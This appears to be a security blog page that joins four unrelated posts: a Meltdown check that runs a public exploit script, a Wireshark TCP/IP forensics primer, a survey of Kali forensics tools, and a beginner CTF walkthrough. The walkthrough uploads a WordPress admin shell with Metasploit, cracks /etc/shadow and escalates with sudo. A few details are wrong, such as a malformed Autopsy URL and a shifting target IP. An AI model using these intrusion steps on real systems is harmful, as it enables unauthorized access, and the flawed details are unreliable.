Check Meltdown Vulnerability in Any CPU

Hello Friends!! You must be heard of the latest vulnerbility “Meltdown” which has been discovered almost in every CPU having intel processessor, from this link you can check list of vulnerable CPU discription. Today we are going to disccuss how to “Check Metltadown vulnerability in any CPU” by using a script.

From Wikipedia

Meltdown is a hardware vulnerability affecting Intel x86 microprocessors and some ARM-based microprocessors. It allows a rogue process to read any physical, kernel or other process's mapped memory, regardless of whether or not it should be able to do so. It allows an unauthorized process to read data from any address that is mapped to the current process's memory space, because instruction pipelining in the affected processors means that the data from the unauthorized address will almost always be temporarily loaded into the CPU's cache during speculative execution, from which it can be recovered using other techniques, even if the original read instruction eventually fails due to privilege checking and never produces a readable result. Since many operating systems map physical memory, kernel processes, and other running user space processes into the address space of every process and rely on privilege checking to prevent unauthorized access, Meltdown effectively allows a rogue process to read any physical, kernel or other process's mapped memory, regardless of whether or not it should be able to do so. Accordingly, many servers and cloud services were impacted, as well as a potential majority of smart devices and embedded devices using ARM based processors (mobile devices, smart TVs and others), including a wide range of networking equipment.

Let’s start!!

Open the terminal and type given below command to download the script form git hub. It can only dump linux_proc_banner which is work as an interface for internal data structures in the kernel and it is used to get information regarding the system and to change certain kernel Process.

git clone https://github.com/paboldin/meltdown-exploit.git 

From given below image you can observe I had successfully download this script in my Linux machine.

Now explore the downloaded folder in terminal now run the command “make” for compiling the program file before running the script.

Now run the script by executing given below command which will identify the state of vulnerability by read its memory space.

./run.sh

From given below image you can observe where it is vulnerable ON has dumped the complete detail of CPU Processor. So here it has shown some details such as:

Vendor Id: Vendor ID or VID is unique number assign to a Hardware to identify it on which system it has been installed.

CPU family: Same functionality Processors are categories into same family, here CPU family 6 means indicate a model from Pentium Pro family.

Model: Indicates model number of CPU family.

Model name: Holds Model name of Processor

Stepping: It is used identify the version of microprocessor

Microcode: it is a lowest instruction set permanently to control the microprocessor

CPU MHz: Describe Usage of CPU.

Cache size: Define the size of cache memory.

You can also verify above result by executing given below command which is used for obtaining details of system information.

Network Packet Forensic using Wireshark

Today we are going to discuss “TCP Forensic”  by covering some important track such as how Data is transferring between two nodes, what is “OSI 7 layer model” and Wireshark stores which layers information when capture the traffic between two networks.

As we know for transferring the data from one system to other we need a network connection which can be wired or wireless connection. But in actually transmission of data is not only depends upon network connection apart from that it involves several phases for transmitting data from one system to another which was explained by OSI model.

OSI stands for Open Systems Interconnection model which is a conceptual model that defines and standardizes the process of communication between sender’s and receiver’s system. The data is transfer through 7 layers architecture where each layer has a specific function in transmitting data over next layer.  

Now have a look over given below image where we had explained the functionality of each layer in OSI model. So when data is transmitted by sender’s network then it will go in downward direction and data move from application layer to physical layer whereas when receiver will receive the transmitted data it will come in upward direction from physical layer to application layer.

Flow of Data from Sender’s network: Application > Presentation > Session > Transport > Network > Data Link > Physical

Flow of Data from Receiver’s network: Physical > Data Link > Network > Transport > Session > Presentation > Application

Examine Layers captured by Wireshark

Basically when a user opens any application for sending or receiving Data then he directly interacts with application layer for both operations either sending or receiving of data. For example we act as client when use Http protocol for uploading or Downloading a Game; FTP for downloading a File; SSH for accessing the shell of remote system.

While connecting with any application for sharing data between server and client we make use of Wireshark for capturing the flow of network traffic stream to examine the OSI model theory through captured traffic.

From given below image you can observe that wireshark has captured the traffic of four layers in direction of source (sender) to destination (receiver) network.

Here it has successfully captured Layer 2 > Layer 3 > Layer 4 and then Layer 7 information.

Ethernet Header (Data Link)

Data link layer holds 6 bytes of Mac address of sender’s system and receiver’s system with 2 bytes of Ether type is used to indicate which protocol is encapsulated i.e. IPv4/IPv6 or .

In wireahark Ethernet II layer represent the information transmitted over data link layer. From given below image you can observed that highlighted lower part of wireshark is showing information in Hexadecimal format where the first row holds information of Ethernet headers details.

So here you can get source and destination Mac address which also available in Ethernet Header.

The row is divided into three columns as described below: 

As we know Mac address of system is always represents in Hexadecimal format but Ether type are generally categories in given below ways.

Once again if you notice given below image then you can observe the highlighted text in Pink color is showing hex value 08 00 which indicates that here IPv4 is used.

IP Header (Network Layer)

IP header in wireshark described the network layer information which is also known as backbone of OSI model as it holds Internet Protocol version 4 complete details. Network layer divides data frame into packets and define its routing path through some hardware devices such as routers, bridges, and switches. These packets are identified through their logical address i.e. source or destination network IP address.

In Image of wireshark I have highlighted six most important values which contain vital information of a data packet and this information always flow in same way as they are encapsulated in same pattern for each IP header.

Now here 45 represent IPv4 header length while 40 is time to live (TTL) of packet and 06 is hex value for TCP protocol which means these values get change any things change i.e. TTL, Ipv4 and Protocol.

Therefore you can take help of given below table for examine TTL value for different operating system. 

Similarly you can take help of given below table for examine Protocol value for different operating system.

From given below image you can observe Hexadecimal information of IP header field and using given table you can study these value to obtain their original value.

TCP Header (Transport layer)

Transmission Control Protocol (TCP) and User Datagram Protocol (UDP) and Internet Control Message protocol (ICMP) are the major protocols as it gives host-to-host connectivity at the Transport Layer of the OSI model. It is also known as Heart of OSI model as it play major role in transmitting errors free data.

By examine Network Layer information through wireshark we found that here TCP is used for establishing connection with destination network.

We knew that a computer communicates with another device like a modem, printer, or network server; it needs to handshake with it to establish a connection.

TCP follow Three-Way-Handshakes as describe below:

·         Client sends a TCP packet to the server with the SYN flag set.

·         Server responds to the client request with the SYN and ACK flags set.

·         Client completes the connection by sending a packet with the ACK flag set

Structure of TCP segment

Transmission Control Protocol accepts data from a data stream, splits it into chunks, and adds a TCP header creating a TCP segment. A TCP segment only carries the sequence number of the first byte in the segment.

A TCP segment consists of a segment header and a data section. The TCP header contains mandatory fields, and an optional extension field.

Source Port	The 16-bit source port number, Identifies the sending port.
Destination Port	The 16-bit destination port number. Identifies the receiving port
Sequence Number	The sequence number of the first data byte in this segment. If the SYN control bit is set, the sequence number is the initial sequence number (n) and the first data byte is n+1.
Acknowledgment Number	If the ACK control bit is set, this field contains the value of the next sequence number that the receiver is expecting to receive.
Data Offset	The number of 32-bit words in the TCP header. It indicates where the data begins.
Reserved	Six bits reserved for future use; must be zero.
Flags	CWR, ECE, URG, ACK, PSH, RST, SYN, FIN
Window	Used in ACK segments. It specifies the number of data bytes, beginning with the one indicated in the acknowledgment number field that the receiver (the sender of this segment) is willing to accept.
Checksum	The 16-bit one's complement of the one's complement sum of all 16-bit words in a pseudo-header, the TCP header, and the TCP data. While computing the checksum, the checksum field itself is considered zero.
Urgent Pointer	Points to the first data octet following the urgent data. Only significant when the URG control bit is set.
Options	Just as in the case of IP datagram options, options can be either: – A single byte containing the option number – A variable length option in the following format
Padding	The TCP header padding is used to ensure that the TCP header ends and data begins on a 32 bit boundary.  The padding is composed of zeros.

Different Types of TCP flags

TCP flags are used within TCP header as these are control bits that specify particular connection states or information about how a packet should be set. TCP flag field in a TCP segment will help us to understand the function and purpose of any packet in the connection. 

From given below image you can observe Hexadecimal information of TCP header field and using given table you can study these value to obtain their original value.

Sequence and acknowledgement numbers are is major part of TCP, and they act as a way to guarantee that all data is transmitted consistently since all data transferred through a TCP connection must be acknowledged by the receiver in a suitable way. When an acknowledgement is not received, then the sender will again send all data that is unacknowledged.

Using given below table you can read Hex value of other Port Number and their Protocol services. Although these services operate after getting acknowledgement from destination network and explore at application layer OSI model.

In this way you can examine every layer of Wireshark for Network Packet Forensic.

Forensics Tools in Kali

Kali linux is often thought of in many instances, it’s one of the most popular tools available to security professionals. It contains all the robust package of programs that can be used for conducting a host of security based operations. One of the many parts in its division of tools is the forensics tab, this tab holds a collection of tools that are made with the explicit purpose of performing digital forensics.

Forensics is becoming increasingly important in today’s digital age where many crimes are committed using digital technology, having an understanding of forensics can greatly increase the chance of making certain that criminals don’t get away with a crime.

This article is aimed at giving you an overview of the forensics capabilities possessed by Kali Linux.

So, let’s start with the programs as they appear in the forensics menu:

Autopsy

A tool used by the military, law enforcement and entities when it comes time to perform forensic operations. This package is probably one of the most robust ones available through open source, it combines the functionalities of many other smaller packages that are more focused in their approach in one neat application with a web browser based UI.

It is used to investigate disk images. When you click on Autopsy, it starts the service and its user interphase can be accessed on the web browser at https://9999:Localhost/autopsy.  It gives the user a full range of options required to create a new case file: Case Name, Description, Investigators Name, Host name, Host time zone, etc.

Its functionalities include – Timeline analysis, keyword search, web artifacts, hash filtering, data carving, multimedia and indicators of compromise. It accepts disk images in RAW or E01 formats and generates reports in HTML, XLS and body file depending on what is required for a particular case.

Its robustness is what makes it such a great tool, be it case management, analysis or reporting, this tool has you covered.

Binwalk  

This tool is used while dealing with binary images, it has the capability of finding embedded file and executable code by exploring the image file. It is a very powerful tool for those who know what they are doing, if used right, it can be used to find sensitive information hidden in firmware images that can be used to uncover a hack or used to find a loophole to exploit. 

This tool is written in python and uses the libmagic library, making it perfect for usage with magic signatures created for Unix file utility. To make things easier for investigators, it contains a magic signature file which holds the most commonly found signatures in firmware’s, making it easier to spot anomalies.

Bulk Extractor  

This is a very interesting tool, when an investigator is looking to extract certain kind of data from the digital evidence file, this tool can carve out email addresses, URL’s, payment card numbers, etc. This is tool works on directories, files and disk images. The data can be partially corrupted or it can be compressed, this tool will find its way into it.

The tool comes with features which help create a pattern in the data that is found repeatedly, such as URL’s, email ids and more and presents them in a histogram format. It has a feature by which it creates a word list from the data found, this can assist in cracking the passwords of encrypted files.

Chkrootkit

This program is mostly used in a live boot setting. It is used to locally check the host for any installed rootkits. It comes in handy trying to harden an endpoint or making sure that a hacker has not compromised a system.

It has the capability to detect system binaries for rootkit modification, lastlog deletions, quick and dirty string replacements and utemp deletions. This is just a taste of what it can do, the package seems simple at first glance but to a forensic investigator, its capabilities are invaluable.

Foremost  

Deleted files which might help solve a data incident? No problem, Foremost is an easy to use open source package that can carve data out of formatted disks. The filename itself might not be recovered but the data it holds can be carved out.

Foremost was written by US Air Force special agents. It can files by referencing a list of headers and footers even if the directory information is lost, this makes for fast and reliable recovery.

Galleta  

When following a trail of cookies, this tool will parse them into a format that can be exported into a spreadsheet program.

Understanding cookies can be a tough nut to crack, especially if the cookies might be evidence in a cybercrime that was committed, this program can lend a hand by giving the capability to structure the data in a better form and letting you run it through an analysis software, most of which usually require the data to be in some form of a spreadsheet.

Hashdeep

This program is a must when dealing with hashes. Its defaults are focused on MD5 and SHA-256. It can be existing files that have moved in a set or new files placed in a set, missing files or matched files, Hashdeep can work with all these conditions and give reports that can be scrutinized, it is very helpful for performing audits.

One of its biggest strengths is performing recursive hash computations with multiple algorithms, which is integral when time is of the essence.

Volafox

This is a memory analysis tool that has been written in Python, it is focused towards memory forensics for MAC OS X. It works on the Intel x86 and IA-32e framework. If you’re trying to find malware or any other malicious program that was or is residing on the system memory, this is the way to go.

Volatility  

Probably one of the most popular frameworks when it comes to memory forensics. This is a python based tool that lets investigators extract digital data from volatile memory (RAM) samples. It is compatible to be used with majority of the 64 and 32 bit variants of windows, selective flavors of Linux distros including android. It accepts memory dumps in various forms, be it raw format, crash dumps, hibernation files or VM snapshots, it can give a keen insight into the runtime state of the machine, this can be done independently of the hosts investigation.

Here’s something to consider, decrypted files and passwords are stored in the RAM, and if they are available, investigating files that might be encrypted in the hard disk can be a lot easier and the overall time of the investigation can be considerably reduced.

We will be following up this particular article with an in-depth review of the tools we have mentioned, with test cases.

Have fun and stay ethical.

                                   

About The Author

Abhimanyu Dev is a Certified Ethical Hacker, penetration tester, information security analyst and researcher. Connect with him here

Hack the Basic Penetration VM (CTF challenge)

Today we are going to take another CTF challenge known as Basic Penetration. The credit for making this VM machine goes to “Josiah Pierce” and it is another boot2root challenge where we have to root the server to complete the challenge. You can download this VM here.

Security Level: Beginner

Penetrating Methodology:

1.      Scanning

·         Netdiscover

·         NMAP

2.      Enumeration

·         Web Directory search 

·         Credential harvesting

3.      Exploiting

·         Metasploit shell upload

·         LinEnum.sh

4.      Privilege Escalation

·         Exploit Sudo rights

Walkthrough:

1. Scanning:

Let’s start off by scanning the network and identifying host IP address. We can identify our host IP as 192.168.1.100 by using Netdiscover.

netdiscover

Then we used Nmap for port enumeration. We find that port 21(ftp), 22(ssh) and 80 are open on the target.

nmap -A 192.168.1.100

2. Enumeration:

As we can see port 80 is open, so we tried to open the IP address in our browser but we didn’t find anything on the webpage.

So we used dirb for directory enumeration.

Dirb http://192.168.1.101

After brute forcing with dirb we found a directory named /secret

Now we tried to open it in our browser. We came to know that the website is a wordpress site.

We tried to open the admin page 192.168.1.100/secret/wp-admin but it wouldn’t open and we got redirected to the url which you can see in the screenshot

Then we added vtcsec to hosts file.

Now we were able to access the admin page.

3. Exploiting:

We tried some basic credential combinations used in wordpress and found admin:admin was working for us.

Then we used Metasploit to upload admin shell into the target using the above credentials and wait for a meterpreter session.

 use exploit/unix/webapp/wp_admin_shell_upload

set username admin

set password admin

set targeturi /secret/

set rhosts 192.168.1.100

run

We successfully got a meterpreter session.

We then uploaded LineEnum.sh script to check if password hashes are stored in /etc/passwd and also attempt to read restricted file i.e. /etc/shadow.

Here we can see the /etc/shadow has read only permission.

After opening the /etc/shadow file we can see there is user with the name marlinspike

We downloaded this shadow file into our local system and used John the Ripper to crack the password.

We found the password for the user marlinspike is marlinspike

5.     Privilege Escalation:

Now we login as marlinspike.

We checked the sudoers list and found that we have all the access as root, so we did sudo as superuser.

Great! We have successfully completed our challenge as we able access the target as a root user.

su marlinspike

sudo –l

sudo su

id

Auqib Wani is a Certified Ethical Hacker, Penetration Tester and a Tech Enthusiast with more than 5 years of experience in the field of Network & Cyber Security. Contact Here